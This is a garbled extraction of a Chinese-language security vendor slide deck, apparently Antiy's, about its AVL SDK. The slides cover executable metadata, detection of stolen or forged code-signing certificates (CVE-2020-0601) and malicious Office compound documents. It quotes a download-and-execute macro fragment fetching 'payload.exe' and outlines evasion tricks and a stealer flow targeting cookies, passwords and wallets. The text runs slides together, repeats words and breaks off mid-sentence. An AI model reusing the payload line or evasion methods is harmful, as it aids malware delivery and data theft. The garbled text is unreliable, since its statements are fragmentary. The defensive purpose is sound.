安天AVL SDK為執(zhí)行體治理提供元數(shù)據(jù)化能力

為什么要將執(zhí)行體元數(shù)據(jù)化安天協(xié)同用戶達(dá)成全量執(zhí)行體識(shí)別和精細(xì)管控執(zhí)行體的元數(shù)據(jù)化什么是執(zhí)行體?網(wǎng)絡(luò)空間對(duì)抗中的“彈藥和裝置”??執(zhí)行體的元數(shù)據(jù)化是指將執(zhí)行體的元數(shù)據(jù)和執(zhí)行體本身分開存儲(chǔ)的過程。執(zhí)行體的元數(shù)據(jù)包括但不限于來源、成分、結(jié)構(gòu)、用途、行為、脆弱性等維度的信息result=URLDownload(0,"http:/payload.exe",Page5為什么要將執(zhí)行體元數(shù)據(jù)化粗糙的標(biāo)識(shí)難以支撐精細(xì)化的治理Page6?沒有提取或充分提取簽名、加密混淆手段、組成成分等重要信息?但存在執(zhí)行體無(wú)法觸發(fā)、不能完整執(zhí)行、效率低的問題?但主要服務(wù)與惡意代碼檢測(cè)，未輸出拆解結(jié)果檢測(cè)對(duì)象格式識(shí)別拆解情報(bào)承載格式識(shí)別拆解情報(bào)承載框架鑒定分析分析檢測(cè)結(jié)果威脅檢測(cè)工作過程能力未開放與輸出安天安天AVLSDK的執(zhí)行體元Page8成分來源成分歷史應(yīng)用者第三方組件脆弱性行為環(huán)境行為加解密加解密用途Page9數(shù)字簽名是可信計(jì)算的重要組成部分現(xiàn)有安全軟件簽名機(jī)制的不足與問題通過驗(yàn)證簽名是否有效進(jìn)行運(yùn)行管控，有的APT組織盜用合法證書給自利用身份相關(guān)數(shù)據(jù)構(gòu)建證書鏈，而不能判定證書持有者的信譽(yù)度。證書未對(duì)證書屬性（如簽名算法）合法性驗(yàn)證，攻擊者利用此攻擊點(diǎn)，偽裝簽名體結(jié)構(gòu)帶有簽名的rE文件結(jié)構(gòu)更收斂更精細(xì)的執(zhí)行體管控有效無(wú)效有效性有效性權(quán)威性權(quán)威性是否存在秘鑰泄露是否存在秘鑰泄露是否存在漏洞是否存在漏洞是否是廣告件是否是廣告件是否被是否被APT組織利用廢止證書離線場(chǎng)景下的驗(yàn)證?在離線場(chǎng)景下，因無(wú)法連接遠(yuǎn)程證書查詢服務(wù)器實(shí)時(shí)查詢證書狀態(tài)基于元數(shù)據(jù)化實(shí)現(xiàn)離線場(chǎng)景下廢止證書的識(shí)別?安天AVLSDK可對(duì)執(zhí)行體進(jìn)行身份合法性相關(guān)的量級(jí)離線證書庫(kù)，綜合驗(yàn)證證書合法性撤銷庫(kù)中證書元數(shù)據(jù)(序列號(hào))安天EDR產(chǎn)品簽名結(jié)果顯示盜用證書簽名逃逸檢測(cè)的攻擊識(shí)別?證書被攻擊者盜用，使惡意執(zhí)行體規(guī)避了系統(tǒng)簽基于元數(shù)據(jù)支撐盜用證書的執(zhí)行體識(shí)別?安天AVLSDK可對(duì)執(zhí)行體進(jìn)行元數(shù)據(jù)提取，得到身份相關(guān)的元數(shù)據(jù)是否被盜用“低信譽(yù)”證書識(shí)別基于元數(shù)據(jù)支撐擁有合法簽名的廣告件識(shí)別對(duì)該證書簽發(fā)的執(zhí)行體的判定信息，識(shí)別該證書處于低信譽(yù)值狀態(tài)，結(jié)合惡意代碼檢測(cè)特征庫(kù)，判定該執(zhí)行偽造證書的識(shí)別?證書驗(yàn)簽算法存在漏洞風(fēng)險(xiǎn)，攻擊者可利用漏洞（如CVE-2020-0601）進(jìn)行證書的偽造，攻擊者利用證書簽名算法（如橢圓算法構(gòu)造了欺騙性的代碼簽名根證書，對(duì)惡意代碼進(jìn)行簽名，從而使該基于元數(shù)據(jù)識(shí)別偽造證書?安天引擎可以對(duì)執(zhí)行體所攜帶的數(shù)字簽名證書進(jìn)行證書算法相關(guān)的元數(shù)據(jù)提取，包括簽名算法，理判斷證書的簽名算法是否與標(biāo)準(zhǔn)算法匹配，如橢圓ECC算法中所提供的G（橢圓曲線上的一個(gè)點(diǎn)）是否與標(biāo)準(zhǔn)證書算法匹配，從而將源文件發(fā)給廠商進(jìn)行分析?支撐不提交文檔內(nèi)容情況下的脫敏分析、標(biāo)記和溯源等?客戶防御場(chǎng)景的主要風(fēng)險(xiǎn)入口之一，存在多種利用復(fù)合威脅類型威脅分類1利用宏攻擊公式宏2公式宏隱藏3XLSB公式宏編碼4VBA宏5利用模版攻擊遠(yuǎn)程模版注入6利用內(nèi)嵌對(duì)象攻擊789利用漏洞攻擊利用加密攻擊文檔加密利用內(nèi)嵌惡意宏的文檔進(jìn)行魚叉郵件攻擊①攻擊投放階段執(zhí)執(zhí)②數(shù)據(jù)竊取階段攻擊者 下載 下載/釋放惡意程序 投放釣魚郵件釣魚網(wǎng)站公共網(wǎng)站宏文檔下載/釋放下載/釋放加載器竊取竊密木馬系統(tǒng)信息重要文件鍵盤記錄瀏覽器Cookie行保存的密碼遠(yuǎn)程連接數(shù)字錢包數(shù)數(shù)據(jù)據(jù)服務(wù)器TCP/HTTP/SMTP/FTP等③數(shù)據(jù)回傳階段回回傳復(fù)合文檔檢測(cè)面臨的挑戰(zhàn)攻擊者利用復(fù)合文檔的易篡改、易嵌套、易填充等特性躲避檢測(cè)在屬性域內(nèi)嵌惡意URL地址，利用正常VB代碼讀取屬性域中的惡意2、通過多層嵌套方式躲避檢利用正常的vba宏，讀取拼接內(nèi)嵌在單元格中的url，下載執(zhí)行，躲2018-0802等，通過不同cve觸發(fā)漏洞執(zhí)行，在某個(gè)cve被補(bǔ)丁修復(fù)難以觸發(fā)，但可嘗試觸發(fā)其他漏洞4、通過加默認(rèn)密碼躲避查殺office有一個(gè)內(nèi)置的默認(rèn)密碼，攻擊者基于這點(diǎn)通過對(duì)惡意文檔增屬性域中的標(biāo)記被惡意填充惡意URL使用了01的標(biāo)記用于進(jìn)入到cve-0798的流程，通過cve-0798進(jìn)入對(duì)應(yīng)的cve-11882某復(fù)合文檔元數(shù)據(jù)示例復(fù)合文檔的細(xì)粒度元數(shù)據(jù)提取某復(fù)合文檔元數(shù)據(jù)示例12編寫文檔正文所使用的語(yǔ)言(中文、英文、3打卡文檔需要使用的軟件名稱(如Office,PDF等)打卡文檔需要使用的軟件版本(如Office2016)4文檔編碼的方式(如Office常采用XLS56可疑的shellcode數(shù)據(jù)7淆8安天智甲客戶端集群安天智甲管理中心客戶場(chǎng)景下的文檔脫敏分析與追溯安天智甲客戶端集群安天智甲管理中心終端資產(chǎn)管理終端資產(chǎn)管理終端安全查殺終端安全查殺終端合規(guī)檢查終端合規(guī)檢查可執(zhí)行體治理可執(zhí)行體治理歷史威脅溯源分析歷史威脅溯源分析遠(yuǎn)程取證分析遠(yuǎn)程取證分析可視化運(yùn)維管理可視化運(yùn)維管理訪問控制管理訪問控制管理監(jiān)控—新增復(fù)合文檔安天智甲客戶安天智甲客戶端服務(wù)器安天智甲客戶端PC機(jī)主動(dòng)投遞主動(dòng)投遞敏感文檔Page22傳統(tǒng)反病毒規(guī)則向量級(jí)規(guī)則知識(shí)標(biāo)簽安天協(xié)同用戶達(dá)成全量執(zhí)行體識(shí)別和